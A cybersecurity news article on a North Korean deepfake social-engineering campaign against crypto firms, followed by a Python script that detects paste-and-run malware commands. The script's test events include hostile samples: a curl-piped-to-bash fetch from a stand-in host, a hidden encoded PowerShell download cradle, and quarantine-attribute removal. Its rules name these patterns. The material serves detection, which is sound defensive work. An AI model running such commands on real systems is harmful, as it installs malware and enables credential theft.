North Korea’s cyber operations are back in focus after new research documented a group tracked as UNC1069 targeting cryptocurrency companies. The findings were published by Mandiant, the threat intelligence division of Google Cloud. According to the report, the campaign is actively going after crypto exchanges and blockchain firms, and the attackers are using artificial intelligence to make their lures more convincing.

What makes this operation different is the use of AI-generated deepfake technology. The attackers create realistic video impersonations of trusted executives or business partners. Victims are invited to what appears to be a normal company video meeting. Everything looks legitimate, including the invite and the person speaking on screen.
The attack usually starts with compromised internal accounts. Hackers gain access to an employee’s email or messaging platform and send meeting invitations from it. Because the invite comes from a genuine account, it does not raise suspicion. This increases the chances that the targeted employee will join the meeting.
Once inside the meeting, the attacker claims there is a technical issue that needs urgent attention and asks the victim to run specific commands on their computer to fix it. The commands are malicious: they install hidden malware, which then opens a backdoor or steals sensitive credentials.
Researchers confirmed that both Windows and macOS systems have been targeted. The malware is designed to collect login details, authentication tokens, and other valuable data. In crypto firms, this can include access to digital wallets or internal systems. The campaign appears to be financially motivated.
North Korean-linked cyber groups have long been associated with cryptocurrency theft. Digital assets are attractive because they can be moved quickly across borders. They are also harder to trace compared to traditional banking transfers. Targeting crypto companies directly increases the potential payout.
What makes this campaign dangerous is its heavy use of social engineering. Instead of exploiting software bugs, the attackers manipulate human trust. A realistic video call reduces doubt and creates urgency. Under pressure, employees may follow instructions without verifying them.
Security experts recommend verifying unexpected requests through a second communication channel, such as calling the supposed sender back on a number you already have. Companies should treat any request to type or paste commands into a terminal or the Run dialog during an unscheduled meeting as a red flag, no matter how familiar the person on screen looks. Multi-factor authentication and strong monitoring can help detect and contain suspicious activity, with one caveat: because this malware harvests authentication tokens, it can reuse sessions that have already passed MFA, so token theft on an endpoint needs to be detected and the sessions revoked rather than relied on MFA to block. As AI tools improve, organizations must stay alert and question even familiar faces on screen.
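The "run these commands to fix the problem" step and the monitoring advice above both come down to one detectable moment: a user pasting a download-and-execute one-liner into a shell. The script below is an added example, not code from the page or from the Mandiant report, that scans process-creation events for the command shapes such instructions typically take on Windows and macOS. The events are constructed, the field layout (host, os, user, parent_image, image, command_line) is an assumed sensor-neutral shape, and it assumes the sensor records the full command line as typed (true for Windows Run-dialog launches and for shells invoked with -c).

```python
"""Flag paste-and-run "fix" commands in process-creation telemetry.

Added example; the events and field layout below are constructed and assumed,
not telemetry from the campaign described on the page.
"""
import base64
import re

POWERSHELL = {"powershell.exe", "pwsh.exe", "pwsh"}

# Patterns reused in two places (plain command line and decoded -enc payload).
CRADLE = re.compile(
    r"\b(iex|invoke-expression|invoke-webrequest|iwr|downloadstring|net\.webclient)\b", re.I)
ENCODED = re.compile(r"-(encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.I)

# (rule name, regex, image basenames the rule applies to; None = any image).
# Scoping the PowerShell rules to PowerShell images keeps "sed -e s/foo/bar/"
# from tripping the encoded-command rule.
RULES = [
    ("curl_or_wget_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I), None),
    ("base64_decode_piped_to_shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I), None),
    ("macos_quarantine_attr_removed",
     re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b", re.I), None),
    ("macos_osascript_inline",
     re.compile(r"\bosascript\s+-e\b", re.I), None),
    ("powershell_hidden_window",
     re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), POWERSHELL),
    ("powershell_download_cradle", CRADLE, POWERSHELL),
    ("powershell_encoded_command", ENCODED, POWERSHELL),
]

# Constructed sample events: three malicious, two benign.
SAMPLE_EVENTS = [
    {"host": "mac-trader-01", "os": "macos", "user": "jlee",
     "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/zsh",
     "command_line": 'zsh -c "curl -fsSL https://update.example.invalid/fix.sh | bash"'},
    {"host": "win-ops-07", "os": "windows", "user": "mpatel",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     # -enc payload is UTF-16LE base64 of "IEX (New-Object" (constructed)
     "command_line": "powershell -w hidden -NoP -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "mac-dev-03", "os": "macos", "user": "rkim",
     "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/bash",
     "command_line": 'bash -c "echo aGVsbG8= | base64 -d | sh; xattr -d com.apple.quarantine ./helper"'},
    {"host": "win-ops-07", "os": "windows", "user": "mpatel",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell Get-Process | Sort-Object CPU -Descending"},
    {"host": "mac-trader-01", "os": "macos", "user": "jlee",
     "parent_image": "/bin/zsh",
     "image": "/usr/bin/sed",
     "command_line": "sed -e s/foo/barbaz/g config.txt"},
]


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(command_line: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent/undecodable."""
    m = ENCODED.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def classify(event: dict) -> list:
    """Names of every rule the event trips (empty list = nothing suspicious)."""
    image = _basename(event["image"])
    cmd = event["command_line"]
    hits = [name for name, rx, scope in RULES
            if (scope is None or image in scope) and rx.search(cmd)]
    # Look through the base64 layer: the plain command line shows only
    # "-enc <blob>", so the cradle check is re-run on the decoded text.
    if "powershell_encoded_command" in hits and CRADLE.search(decode_encoded_command(cmd)):
        hits.append("download_cradle_in_decoded_command")
    return hits


def scan(events: list) -> list:
    """Turn raw events into alerts; two or more rule hits escalate to high."""
    alerts = []
    for ev in events:
        hits = classify(ev)
        if not hits:
            continue
        alerts.append({
            "host": ev["host"], "user": ev["user"], "os": ev["os"],
            "image": _basename(ev["image"]), "parent": _basename(ev["parent_image"]),
            "rules": hits, "severity": "high" if len(hits) >= 2 else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f'{a["severity"]:6} {a["host"]:14} {a["user"]:7} {a["image"]}: {", ".join(a["rules"])}')
```

The rules only see the endpoint side; none of them knows a video call was in progress. In practice the alert is far more valuable joined with calendar or meeting-client telemetry (which account sent the invite, whether the meeting was on the victim's calendar before that day), which is exactly the verification step the advice above asks humans to perform.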
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news


